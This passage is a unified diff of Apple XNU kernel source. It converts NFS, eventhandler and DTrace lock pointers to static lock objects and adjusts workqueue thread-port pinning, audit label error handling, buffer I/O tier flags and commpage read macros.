                                np->n_hflag &= ~NHLOCKWANT;
                                wakeup(np);
                        }
-                       lck_mtx_unlock(nfs_node_hash_mutex);
+                       lck_mtx_unlock(&nfs_node_hash_mutex);
                        nfs_node_clear_busy2(dnp, np);
                        error = nfs_vinvalbuf(vp, V_SAVE, ctx, 1);
                        FSDBG(260, np, np->n_size, np->n_vattr.nva_size, 0xf00d0011);
@@ -4569,13 +4569,13 @@ again:
                         * again if another object gets created with the same filehandle
                         * before this vnode gets reclaimed
                         */
-                       lck_mtx_lock(nfs_node_hash_mutex);
+                       lck_mtx_lock(&nfs_node_hash_mutex);
                        if (np->n_hflag & NHHASHED) {
                                LIST_REMOVE(np, n_hash);
                                np->n_hflag &= ~NHHASHED;
                                FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
                        }
-                       lck_mtx_unlock(nfs_node_hash_mutex);
+                       lck_mtx_unlock(&nfs_node_hash_mutex);
                        /* clear flags now: won't get nfs_vnop_inactive for recycled vnode */
                        /* clear all flags other than these */
                        nfs_node_lock_force(np);
@@ -4613,13 +4613,13 @@ again:
        }
 out:
        /* unlock the node */
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        np->n_hflag &= ~NHLOCKED;
        if (np->n_hflag & NHLOCKWANT) {
                np->n_hflag &= ~NHLOCKWANT;
                wakeup(np);
        }
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
        nfs_node_clear_busy2(dnp, np);
        if (setsize) {
                ubc_setsize(vp, 0);
@@ -4758,13 +4758,13 @@ nfs_vnop_rename(
 
        if (tvp && (tvp != fvp)) {
                /* lock the node while we rename over the existing file */
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                while (tnp->n_hflag & NHLOCKED) {
                        tnp->n_hflag |= NHLOCKWANT;
-                       msleep(tnp, nfs_node_hash_mutex, PINOD, "nfs_rename", NULL);
+                       msleep(tnp, &nfs_node_hash_mutex, PINOD, "nfs_rename", NULL);
                }
                tnp->n_hflag |= NHLOCKED;
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
                locked = 1;
        }
 
@@ -4819,7 +4819,7 @@ nfs_vnop_rename(
                tvprecycle = (!error && !vnode_isinuse(tvp, 0) &&
                    (nfs_getattrcache(tnp, nvattr, 0) || (nvattr->nva_nlink == 1)));
                nfs_node_unlock(tnp);
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                if (tvprecycle && (tnp->n_hflag & NHHASHED)) {
                        /*
                         * remove nfsnode from hash now so we can't accidentally find it
@@ -4830,7 +4830,7 @@ nfs_vnop_rename(
                        tnp->n_hflag &= ~NHHASHED;
                        FSDBG(266, 0, tnp, tnp->n_flag, 0xb1eb1e);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
        }
 
        /* purge the old name cache entries and enter the new one */
@@ -4878,13 +4878,13 @@ out:
        nfs_getattr(tdnp, NULL, ctx, NGA_CACHED);
        if (locked) {
                /* unlock node */
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                tnp->n_hflag &= ~NHLOCKED;
                if (tnp->n_hflag & NHLOCKWANT) {
                        tnp->n_hflag &= ~NHLOCKWANT;
                        wakeup(tnp);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
        }
        nfs_node_clear_busy4(fdnp, fnp, tdnp, tnp);
        FREE(nvattr, M_TEMP);
@@ -5561,13 +5561,13 @@ nfsmout:
                 * again if another object gets created with the same filehandle
                 * before this vnode gets reclaimed
                 */
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                if (np->n_hflag & NHHASHED) {
                        LIST_REMOVE(np, n_hash);
                        np->n_hflag &= ~NHHASHED;
                        FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
        }
        NFS_ZFREE(nfs_req_zone, req);
        FREE(dul, M_TEMP);
@@ -5857,8 +5857,8 @@ out:
  * Invalidate cached directory information, except for the actual directory
  * blocks (which are invalidated separately).
  */
-void
-nfs_invaldir(nfsnode_t dnp)
+static void
+nfs_invaldir_cookies(nfsnode_t dnp)
 {
        if (vnode_vtype(NFSTOV(dnp)) != VDIR) {
                return;
@@ -5873,6 +5873,13 @@ nfs_invaldir(nfsnode_t dnp)
        memset(dnp->n_cookiecache->next, -1, NFSNUMCOOKIES);
 }
 
+void
+nfs_invaldir(nfsnode_t dnp)
+{
+
+       nfs_invaldir_cookies(dnp);
+}
+
 /*
  * calculate how much space is available for additional directory entries.
  */
@@ -6037,7 +6044,7 @@ nfs_dir_cookie_to_lbn(nfsnode_t dnp, uint64_t cookie, int *ptc, uint64_t *lbnp)
        dpptc = NULL;
        found = 0;
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        /*
         * Scan the list of buffers, keeping them in order.
         * Note that itercomplete inserts each of the remaining buffers
@@ -6099,7 +6106,7 @@ nfs_dir_cookie_to_lbn(nfsnode_t dnp, uint64_t cookie, int *ptc, uint64_t *lbnp)
                }
                nfs_buf_itercomplete(dnp, &blist, NBI_CLEAN);
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        if (found) {
                OSAddAtomic64(1, &nfsstats.direofcache_hits);
                return 0;
@@ -6250,7 +6257,7 @@ nfs_dir_buf_cache_lookup(nfsnode_t dnp, nfsnode_t *npp, struct componentname *cn
                lbn = nextlbn;
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        if (found) {
                dnp->n_lastdbl = lbn;
                goto done;
@@ -6323,7 +6330,7 @@ nfs_dir_buf_cache_lookup(nfsnode_t dnp, nfsnode_t *npp, struct componentname *cn
        }
 
 done:
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        if (!error && found && !purge) {
                error = nfs_nget(NFSTOMP(dnp), dnp, cnp, fh->fh_data,
@@ -6402,7 +6409,7 @@ nfs3_readdir_rpc(nfsnode_t dnp, struct nfsbuf *bp, vfs_context_t ctx)
        nmrsize = nmp->nm_rsize;
        bigcookies = nmp->nm_state & NFSSTA_BIGCOOKIES;
        fh = zalloc(nfs_fhandle_zone);
-noplus:
+resend:
        rdirplus = ((nfsvers > NFS_VER2) && NMFLAG(nmp, RDIRPLUS)) ? 1 : 0;
 
        if ((lockerror = nfs_node_lock(dnp))) {
@@ -6483,7 +6490,9 @@ noplus:
                        lck_mtx_lock(&nmp->nm_lock);
                        NFS_BITMAP_CLR(nmp->nm_flags, NFS_MFLAG_RDIRPLUS);
                        lck_mtx_unlock(&nmp->nm_lock);
-                       goto noplus;
+                       nfsm_chain_cleanup(&nmreq);
+                       nfsm_chain_cleanup(&nmrep);
+                       goto resend;
                }
                nfsmout_if(error);
 
@@ -7758,7 +7767,9 @@ nfs_vnop_ioctl(
                if (!auth_is_kerberized(mp->nm_auth)) {
                        return ENOTSUP;
                }
-               error = nfs_gss_clnt_ctx_remove(mp, vfs_context_ucred(ctx));
+               if ((error = nfs_gss_clnt_ctx_remove(mp, vfs_context_ucred(ctx))) == ENOENT) {
+                       error = 0;
+               }
                break;
        case NFS_IOC_SET_CRED:
        case NFS_IOC_SET_CRED64:
@@ -8298,11 +8309,11 @@ nfs_vnop_pageout(
                        xsize = f_offset + size - off;
                }
                lbn = (daddr64_t)(off / biosize);
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                if ((bp = nfs_buf_incore(np, lbn))) {
                        FSDBG(323, off, bp, bp->nb_lflags, bp->nb_flags);
                        if (nfs_buf_acquire(bp, NBAC_NOWAIT, 0, 0)) {
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                                nfs_data_unlock_noupdate(np);
                                /* no panic. just tell vm we are busy */
                                if (!nofreeupl) {
@@ -8352,7 +8363,7 @@ nfs_vnop_pageout(
                                        nfsbufdelwricnt++;
                                        nfs_buf_drop(bp);
                                        nfs_buf_delwri_push(1);
-                                       lck_mtx_unlock(nfs_buf_mutex);
+                                       lck_mtx_unlock(&nfs_buf_mutex);
                                        nfs_data_unlock_noupdate(np);
                                        if (!nofreeupl) {
                                                ubc_upl_abort_range(pl, pl_offset, size, 0);
@@ -8371,12 +8382,12 @@ nfs_vnop_pageout(
                                        FSDBG(323, bp, bp->nb_dirtyoff, bp->nb_dirtyend, 0xd00dee00);
                                        /* we're leaving this block dirty */
                                        nfs_buf_drop(bp);
-                                       lck_mtx_unlock(nfs_buf_mutex);
+                                       lck_mtx_unlock(&nfs_buf_mutex);
                                        continue;
                                }
                        }
                        nfs_buf_remfree(bp);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        SET(bp->nb_flags, NB_INVAL);
                        nfs_node_lock_force(np);
                        if (ISSET(bp->nb_flags, NB_NEEDCOMMIT)) {
@@ -8387,7 +8398,7 @@ nfs_vnop_pageout(
                        nfs_node_unlock(np);
                        nfs_buf_release(bp, 1);
                } else {
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                }
        }
 
index e34b4fbc0c73e9bb8c74ebdee116883b5a830fc0..4fb5cd6800b10d2c5ac1e9ea5a514713027d9826 100644 (file)
@@ -314,6 +314,7 @@ struct nfsmount {
                        uint64_t mounttime; /* used as client ID verifier */
                        uint64_t clientid; /* client ID, short form */
                        thread_call_t renew_timer; /* RENEW timer call */
+                       lck_mtx_t timer_lock; /* RENEW timer lock */
                        nfs_fsid fsid;  /* NFS file system id */
                        TAILQ_HEAD(, nfsnode) delegations; /* list of nodes with delegations */
                        TAILQ_HEAD(, nfsnode) dreturnq; /* list of nodes with delegations to return */
@@ -419,6 +420,7 @@ struct nfsmount {
 #define nm_mounttime    nm_un.v4.mounttime
 #define nm_fsid         nm_un.v4.fsid
 #define nm_renew_timer  nm_un.v4.renew_timer
+#define nm_timer_lock   nm_un.v4.timer_lock
 #define nm_cbid         nm_un.v4.cbid
 #define nm_cblink       nm_un.v4.cblink
 #define nm_cbrefs       nm_un.v4.cbrefs
index 7f7f802935c251434b3ad387206332d46ffc7994..43a2f5d65ad0e741deb80a473ea562c746fe841f 100644 (file)
@@ -215,7 +215,7 @@ struct nfsbuf {
 LIST_HEAD(nfsbuflists, nfsbuf);
 TAILQ_HEAD(nfsbuffreehead, nfsbuf);
 
-extern lck_mtx_t *nfs_buf_mutex;
+extern lck_mtx_t nfs_buf_mutex;
 extern int nfsbufcnt, nfsbufmin, nfsbufmax, nfsbufmetacnt, nfsbufmetamax;
 extern int nfsbuffreecnt, nfsbuffreemetacnt, nfsbufdelwricnt, nfsneedbuffer;
 extern int nfs_nbdwrite;
@@ -431,7 +431,7 @@ struct nfs_vattr {
        } while (0)
 
 
-extern lck_grp_t *nfs_open_grp;
+extern lck_grp_t nfs_open_grp;
 extern uint32_t nfs_open_owner_seqnum, nfs_lock_owner_seqnum;
 
 /*
@@ -799,7 +799,7 @@ struct nfsnode {
 #define NFSTOV(np)      ((np)->n_vnode)
 
 /* nfsnode hash table mutex */
-extern lck_mtx_t *nfs_node_hash_mutex;
+extern lck_mtx_t nfs_node_hash_mutex;
 
 /*
  * printf-like helper macro that also outputs node name.
@@ -822,7 +822,7 @@ TAILQ_HEAD(nfsiodlist, nfsiod);
 TAILQ_HEAD(nfsiodmountlist, nfsmount);
 extern struct nfsiodlist nfsiodfree, nfsiodwork;
 extern struct nfsiodmountlist nfsiodmounts;
-extern lck_mtx_t *nfsiod_mutex;
+extern lck_mtx_t nfsiod_mutex;
 
 #if defined(KERNEL)
 
index 9c92b00c18281c84a8caa1626be67ccff6e3a196..d6db9b7e9d7ed82371ce3d65addc7cdbaf74c39e 100644 (file)
@@ -125,8 +125,5 @@ struct nfsrvcache {
 #define RC_INETADDR     0x20
 #define RC_NAM          0x40
 
-extern lck_grp_t *nfsrv_reqcache_lck_grp;
-extern lck_mtx_t *nfsrv_reqcache_mutex;
-
 #endif /* __APPLE_API_PRIVATE */
 #endif /* _NFS_NFSRVCACHE_H_ */
index 86e618e7dbc75b085ffd882ba535e4b657e67961..5cddcd16671ecdad8424cc75e2d7b6267b9d0e4a 100644 (file)
@@ -512,6 +512,7 @@ static const struct pthread_callbacks_s pthread_callbacks = {
        .ipc_port_copyout_send = ipc_port_copyout_send,
        .task_get_ipcspace = get_task_ipcspace,
        .vm_map_page_info = vm_map_page_info,
+       .ipc_port_copyout_send_pinned = ipc_port_copyout_send_pinned,
        .thread_set_wq_state32 = thread_set_wq_state32,
 #if !defined(__arm__)
        .thread_set_wq_state64 = thread_set_wq_state64,
@@ -535,11 +536,16 @@ static const struct pthread_callbacks_s pthread_callbacks = {
        .semaphore_signal_internal_trap = semaphore_signal_internal_trap,
        .current_map = _current_map,
        .thread_create = thread_create,
+       /* should be removed once rdar://70892168 lands */
+       .thread_create_pinned = thread_create_pinned,
+       .thread_create_immovable = thread_create_immovable,
+       .thread_terminate_pinned = thread_terminate_pinned,
        .thread_resume = thread_resume,
 
        .kevent_workq_internal = kevent_workq_internal,
 
        .convert_thread_to_port = convert_thread_to_port,
+       .convert_thread_to_port_pinned = convert_thread_to_port_pinned,
 
        .proc_get_stack_addr_hint = proc_get_stack_addr_hint,
        .proc_set_stack_addr_hint = proc_set_stack_addr_hint,
index bc4bd48126fca15b21d803773e100590dee0cd54..e6d06d3f57dacfa793b0c83a39ff01a343d040d8 100644 (file)
@@ -1540,8 +1540,12 @@ workq_open(struct proc *p, __unused struct workq_open_args *uap,
                priority_queue_init(&wq->wq_constrained_queue);
                priority_queue_init(&wq->wq_special_queue);
 
-               wq->wq_delayed_call = thread_call_allocate_with_options(
-                       workq_add_new_threads_call, p, THREAD_CALL_PRIORITY_KERNEL,
+               /* We are only using the delayed thread call for the constrained pool
+                * which can't have work at >= UI QoS and so we can be fine with a
+                * UI QoS thread call.
+                */
+               wq->wq_delayed_call = thread_call_allocate_with_qos(
+                       workq_add_new_threads_call, p, THREAD_QOS_USER_INTERACTIVE,
                        THREAD_CALL_OPTIONS_ONCE);
                wq->wq_immediate_call = thread_call_allocate_with_options(
                        workq_add_new_threads_call, p, THREAD_CALL_PRIORITY_KERNEL,
@@ -2835,11 +2839,14 @@ workq_constrained_allowance(struct workqueue *wq, thread_qos_t at_qos,
 
        /*
         * Compute a metric for how many threads are active.  We find the
-        * highest priority request outstanding and then add up the number of
-        * active threads in that and all higher-priority buckets.  We'll also add
-        * any "busy" threads which are not active but blocked recently enough that
-        * we can't be sure they've gone idle yet.  We'll then compare this metric
-        * to our max concurrency to decide whether to add a new thread.
+        * highest priority request outstanding and then add up the number of active
+        * threads in that and all higher-priority buckets.  We'll also add any
+        * "busy" threads which are not currently active but blocked recently enough
+        * that we can't be sure that they won't be unblocked soon and start
+        * being active again.
+        *
+        * We'll then compare this metric to our max concurrency to decide whether
+        * to add a new thread.
         */
 
        uint32_t busycount, thactive_count;
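The reworded comment above describes the admission test for the constrained pool: sum the active threads at and above the highest outstanding request priority, add recently-blocked "busy" threads, and compare against the maximum concurrency. A deliberately simplified, hypothetical model of just that comparison (the kernel's real accounting walks per-QoS buckets and is more involved):

#include <stdbool.h>
#include <stdint.h>

/* Simplified model: admit another constrained thread only while the number of
 * threads presumed runnable (active at or above the request's QoS, plus busy
 * ones that may unblock soon) stays below the pool's max concurrency. */
static bool
constrained_allowance(uint32_t thactive_count, uint32_t busycount,
    uint32_t max_concurrency)
{
	return thactive_count + busycount < max_concurrency;
}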
@@ -2869,7 +2876,7 @@ workq_constrained_allowance(struct workqueue *wq, thread_qos_t at_qos,
                    thactive_count, busycount, 0);
        }
 
-       if (busycount && may_start_timer) {
+       if (may_start_timer) {
                /*
                 * If this is called from the add timer, we won't have another timer
                 * fire when the thread exits the "busy" state, so rearm the timer.
@@ -3270,8 +3277,6 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq,
 
        workq_thread_reset_pri(wq, uth, req, /*unpark*/ true);
 
-       thread_unfreeze_base_pri(uth->uu_thread);
-#if 0 // <rdar://problem/55259863> to turn this back on
        if (__improbable(thread_unfreeze_base_pri(uth->uu_thread) && !is_creator)) {
                if (req_ts) {
                        workq_perform_turnstile_operation_locked(wq, ^{
@@ -3284,7 +3289,6 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq,
                WQ_TRACE_WQ(TRACE_wq_select_threadreq | DBG_FUNC_NONE, wq, 3, 0, 0, 0);
                goto park_thawed;
        }
-#endif
 
        /*
         * We passed all checks, dequeue the request, bind to it, and set it up
@@ -3355,9 +3359,7 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq,
 
 park:
        thread_unfreeze_base_pri(uth->uu_thread);
-#if 0 // <rdar://problem/55259863>
 park_thawed:
-#endif
        workq_park_and_unlock(p, wq, uth, setup_flags);
 }
 
@@ -3540,10 +3542,12 @@ workq_setup_and_run(proc_t p, struct uthread *uth, int setup_flags)
        }
 
        if (uth->uu_workq_thport == MACH_PORT_NULL) {
-               /* convert_thread_to_port() consumes a reference */
+               /* convert_thread_to_port_pinned() consumes a reference */
                thread_reference(th);
-               ipc_port_t port = convert_thread_to_port(th);
-               uth->uu_workq_thport = ipc_port_copyout_send(port, get_task_ipcspace(p->task));
+               /* Convert to immovable/pinned thread port, but port is not pinned yet */
+               ipc_port_t port = convert_thread_to_port_pinned(th);
+               /* Atomically, pin and copy out the port */
+               uth->uu_workq_thport = ipc_port_copyout_send_pinned(port, get_task_ipcspace(p->task));
        }
 
        /*
index 472b1537290c50b95cced9bb9ed797d8c98ef1ed..c4ed657924b265af12de940ac64af827eba79207 100644 (file)
@@ -806,7 +806,9 @@ audit_arg_vnpath(struct kaudit_record *ar, struct vnode *vp, u_int64_t flags)
                if (*vnode_mac_labelp != NULL) {
                        mac.m_buflen = MAC_AUDIT_LABEL_LEN;
                        mac.m_string = *vnode_mac_labelp;
-                       mac_vnode_label_externalize_audit(vp, &mac);
+                       if (mac_vnode_label_externalize_audit(vp, &mac)) {
+                               return;
+                       }
                }
        }
 #endif
index 18567474f85a982bb23fcec6908cbb6b855835f8..82f9b256d1035c4caccb14783d56e7f89b407058 100644 (file)
@@ -85,7 +85,10 @@ audit_mac_new(proc_t p, struct kaudit_record *ar)
        }
        mac.m_buflen = MAC_AUDIT_LABEL_LEN;
        mac.m_string = ar->k_ar.ar_cred_mac_labels;
-       mac_cred_label_externalize_audit(p, &mac);
+       if (mac_cred_label_externalize_audit(p, &mac)) {
+               zfree(audit_mac_label_zone, ar->k_ar.ar_cred_mac_labels);
+               return 1;
+       }
 
        /*
         * grab space for the records.
index 80290b43c75c339da2b51db512638955b71a4817..f9345c4e60d971e8605f0aa90e9861c2c9d15c58 100644 (file)
@@ -102,7 +102,7 @@ static au_sentry_t audit_default_se = {
 struct auditinfo_addr * const audit_default_aia_p = &audit_default_se.se_auinfo;
 
 /* Copied from <ipc/ipc_object.h> */
-#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
+#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
 kern_return_t ipc_object_copyin(ipc_space_t, mach_port_name_t,
     mach_msg_type_name_t, ipc_port_t *, mach_port_context_t, mach_msg_guard_flags_t *, uint32_t);
 void ipc_port_release_send(ipc_port_t);
@@ -1517,7 +1517,7 @@ audit_session_join(proc_t p, struct audit_session_join_args *uap,
 
 
        if (ipc_object_copyin(get_task_ipcspace(p->task), send,
-           MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND) != KERN_SUCCESS) {
+           MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND) != KERN_SUCCESS) {
                *ret_asid = AU_DEFAUDITSID;
                err = EINVAL;
        } else {
index f46094803d7d5caa5013e09d9b112cd49f72678d..92e5fe42f7506b6566e4173da795dc93e371c2ac 100644 (file)
@@ -1036,6 +1036,22 @@ void bufattr_markioscheduled(bufattr_t bap);
  */
 int bufattr_ioscheduled(bufattr_t bap);
 
+/*!
+ *  @function bufattr_markexpeditedmeta
+ *  @abstract Mark a metadata I/O buffer as expedited (i.e. requires a high I/O tier).
+ *  @param bap Buffer attributes to mark.
+ *  @discussion Marks the buffer so that spec_strategy() will know that it should be expedited.
+ */
+void bufattr_markexpeditedmeta(bufattr_t bap);
+
+/*!
+ *  @function bufattr_expeditedmeta
+ *  @abstract Check if a buffer is marked as expedited metadata I/O.
+ *  @param bap Buffer attributes to test.
+ *  @return Nonzero if the buffer is marked expedited metadata I/O, 0 otherwise.
+ */
+int bufattr_expeditedmeta(bufattr_t bap);
+
 #ifdef KERNEL_PRIVATE
 void    buf_setfilter(buf_t, void (*)(buf_t, void *), void *, void(**)(buf_t, void *), void **);
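A hedged sketch of how a filesystem client might use the new markers before issuing a metadata buffer; buf_attr() is part of the existing buf KPI, and bp is an illustrative buf_t:

    #include <sys/buf.h>

    bufattr_t bap = buf_attr(bp);        /* bp: metadata buffer about to be issued (illustrative) */
    bufattr_markexpeditedmeta(bap);      /* request a high I/O tier */
    if (bufattr_expeditedmeta(bap)) {
            /* spec_strategy() will expedite this I/O */
    }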
 
index 279f5f8b0f82e365715ee0cf6ee21e65be931b14..beddcdbe4c0e3d9c33c762f7683ce1b3311f22ff 100644 (file)
@@ -167,7 +167,7 @@ extern vm_offset_t buf_kernel_addrperm;
 
 /*
  * These flags are kept in b_lflags...
- * buf_mtxp must be held before examining/updating
+ * buf_mtx must be held before examining/updating
  */
 #define BL_BUSY         0x00000001      /* I/O in progress. */
 #define BL_WANTED       0x00000002      /* Process wants this buffer. */
@@ -273,6 +273,7 @@ extern vm_offset_t buf_kernel_addrperm;
 #define BA_STRATEGY_TRACKED_IO  0x00002000 /* tracked by spec_strategy */
 #define BA_IO_TIER_UPGRADE      0x00004000 /* effective I/O tier is higher than BA_IO_TIER */
 #define BA_IO_SCHEDULED         0x00008000 /* buf is associated with a mount point that is io scheduled */
+#define BA_EXPEDITED_META_IO    0x00010000 /* metadata I/O which needs a high I/O tier */
 
 #define GET_BUFATTR_IO_TIER(bap)        ((bap->ba_flags & BA_IO_TIER_MASK) >> BA_IO_TIER_SHIFT)
 #define SET_BUFATTR_IO_TIER(bap, tier)                                          \
index ccdd509491143bbedaffc1e01f90521abe2b5bba..f0c627f8ecfbcbc1442941af54507e19069e0312 100644 (file)
@@ -41,6 +41,56 @@ typedef volatile struct commpage_timeofday_data {
        uint64_t        Ticks_per_sec;
 } new_commpage_timeofday_data_t;
 
+/*!
+ * @macro COMM_PAGE_SLOT_TYPE
+ *
+ * @brief
+ * Macro that expands to the proper type for a pointer to a commpage slot,
+ * to be used in a local variable declaration.
+ *
+ * @description
+ * Usage is something like:
+ * <code>
+ *     COMM_PAGE_SLOT_TYPE(uint64_t) slot = COMM_PAGE_SLOT(uint64_t, FOO);
+ * </code>
+ *
+ * @param type   The scalar base type for the slot.
+ */
+#if __has_feature(address_sanitizer)
+#define COMM_PAGE_SLOT_TYPE(type_t)     type_t __attribute__((address_space(1))) volatile *
+#else
+#define COMM_PAGE_SLOT_TYPE(type_t)     type_t volatile *
+#endif
+
+/*!
+ * @macro COMM_PAGE_SLOT
+ *
+ * @brief
+ * Macro that expands to the properly typed address for a commpage slot.
+ *
+ * @param type   The scalar base type for the slot.
+ * @param name   The slot name, without its @c _COMM_PAGE_ prefix.
+ */
+#define COMM_PAGE_SLOT(type_t, name)    ((COMM_PAGE_SLOT_TYPE(type_t))_COMM_PAGE_##name)
+
+/*!
+ * @macro COMM_PAGE_READ
+ *
+ * @brief
+ * Performs a single read from the commpage in a way that doesn't trip
+ * address sanitizers.
+ *
+ * @description
+ * Typical use looks like this:
+ * <code>
+ *     uint64_t foo_value = COMM_PAGE_READ(uint64_t, FOO);
+ * </code>
+ *
+ * @param type   The scalar base type for the slot.
+ * @param name   The slot name, without its @c _COMM_PAGE_ prefix.
+ */
+#define COMM_PAGE_READ(type_t, slot)    (*(COMM_PAGE_SLOT(type_t, slot)))
+
 #endif
 
 #endif
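A hedged sketch of the two access patterns the macros above provide; APPROX_TIME is only an illustrative slot name (i.e. _COMM_PAGE_APPROX_TIME):

    /* One-shot read that does not trip the address sanitizer. */
    uint64_t now = COMM_PAGE_READ(uint64_t, APPROX_TIME);

    /* Keeping a typed slot pointer around for repeated reads. */
    COMM_PAGE_SLOT_TYPE(uint64_t) slot = COMM_PAGE_SLOT(uint64_t, APPROX_TIME);
    uint64_t later = *slot;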
index 0fb01991feac977e87597829f44cf053f04a15d6..24a1c08fc55803bd83003ae2e2399d27d2bad7f2 100644 (file)
@@ -206,14 +206,6 @@ extern uint64_t cdevsw_flags[];
 #define CDEVSW_IS_PTS        0x08
 
 struct thread;
-
-typedef struct devsw_lock {
-       TAILQ_ENTRY(devsw_lock)         dl_list;
-       struct thread                   *dl_thread;
-       dev_t                           dl_dev;
-       int                             dl_mode;
-} *devsw_lock_t;
-
 #endif /* BSD_KERNEL_PRIVATE */
 
 
@@ -295,7 +287,6 @@ extern struct swdevt swdevt[];
  */
 __BEGIN_DECLS
 #ifdef KERNEL_PRIVATE
-void devsw_init(void);
 extern struct cdevsw cdevsw[];
 extern int cdevsw_setkqueueok(int, const struct cdevsw*, int);
 #endif /* KERNEL_PRIVATE */
index bb70011d22ea1c0249a2096c625a931ebccac064..e1ab6a060d7406ca7d5b6cfe907644c83e2d933c 100644 (file)
@@ -50,6 +50,8 @@ extern "C" {
 /*
  * DTrace Implementation Locks
  */
+extern lck_attr_t dtrace_lck_attr;
+extern lck_grp_t dtrace_lck_grp;
 extern lck_mtx_t dtrace_procwaitfor_lock;
 
 /*
@@ -1395,7 +1397,6 @@ extern void dtrace_probe_error(dtrace_state_t *, dtrace_epid_t, int, int,
 extern int dtrace_assfail(const char *, const char *, int);
 extern int dtrace_attached(void);
 extern hrtime_t dtrace_gethrestime(void);
-extern void dtrace_isa_init(void);
 
 extern void dtrace_flush_caches(void);
 
index cd76a05280eee32b1f3093b957297d7ff58de81c..21552dd6b50591a6b7aab1736433afd62a1fb8f6 100644 (file)
@@ -676,10 +676,6 @@ SLIST_HEAD(klist, knote);
 #include <kern/debug.h> /* panic */
 #include <pthread/priority_private.h>
 
-#ifdef MALLOC_DECLARE
-MALLOC_DECLARE(M_KQUEUE);
-#endif
-
 LIST_HEAD(knote_list, knote);
 TAILQ_HEAD(kqtailq, knote);     /* a list of "queued" events */
 
index 307546942e9ce96646bc575e68562b9afc12f778..0f8ae79fc2af369b70e8cb13ebba7364103812e3 100644 (file)
@@ -65,8 +65,8 @@
 #include <uuid/uuid.h>
 
 extern int evh_debug;
-extern lck_grp_t        *el_lock_grp;
-extern lck_attr_t       *el_lock_attr;
+extern lck_grp_t        el_lock_grp;
+extern lck_attr_t       el_lock_attr;
 extern struct eventhandler_entry_arg eventhandler_entry_dummy_arg;
 
 struct eventhandler_lists_ctxt {
@@ -101,13 +101,13 @@ struct eventhandler_list {
 
 typedef struct eventhandler_entry       *eventhandler_tag;
 
-#define EHL_LOCK_INIT(p)        lck_mtx_init(&(p)->el_lock, el_lock_grp, el_lock_attr)
+#define EHL_LOCK_INIT(p)        lck_mtx_init(&(p)->el_lock, &el_lock_grp, &el_lock_attr)
 #define EHL_LOCK(p)             lck_mtx_lock(&(p)->el_lock)
 #define EHL_LOCK_SPIN(p)        lck_mtx_lock_spin(&(p)->el_lock)
 #define EHL_LOCK_CONVERT(p)     lck_mtx_convert_spin(&(p)->el_lock)
 #define EHL_UNLOCK(p)           lck_mtx_unlock(&(p)->el_lock)
 #define EHL_LOCK_ASSERT(p, x)   LCK_MTX_ASSERT(&(p)->el_lock, x)
-#define EHL_LOCK_DESTROY(p)     lck_mtx_destroy(&(p)->el_lock, el_lock_grp)
+#define EHL_LOCK_DESTROY(p)     lck_mtx_destroy(&(p)->el_lock, &el_lock_grp)
 
 #define evhlog(x)       do { if (evh_debug >= 1) log x; } while (0)
 
index 07299c21d26632b47f5e4e03a9e5e72cbcb161c3..3c961ab23c5aa6e4ccbee53e7495c7931796a9ab 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2010 Apple Inc. All rights reserved.
+ * Copyright (c) 2006-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -42,7 +42,8 @@ bool    imageboot_desired(void);
 void    imageboot_setup(imageboot_type_t type);
 int     imageboot_format_is_valid(const char *root_path);
 int     imageboot_mount_image(const char *root_path, int height, imageboot_type_t type);
-int     imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path, const char *outgoing_root_path, const bool rooted_dmg);
+int     imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path,
+    const char *outgoing_root_path, const bool rooted_dmg, const bool skip_signature_check);
 int     imageboot_read_file(struct kalloc_heap *kheap, const char *path, void **bufp, size_t *bufszp);
 int     imageboot_read_file_from_offset(struct kalloc_heap *kheap, const char *path, off_t offset, void **bufp, size_t *bufszp);
 
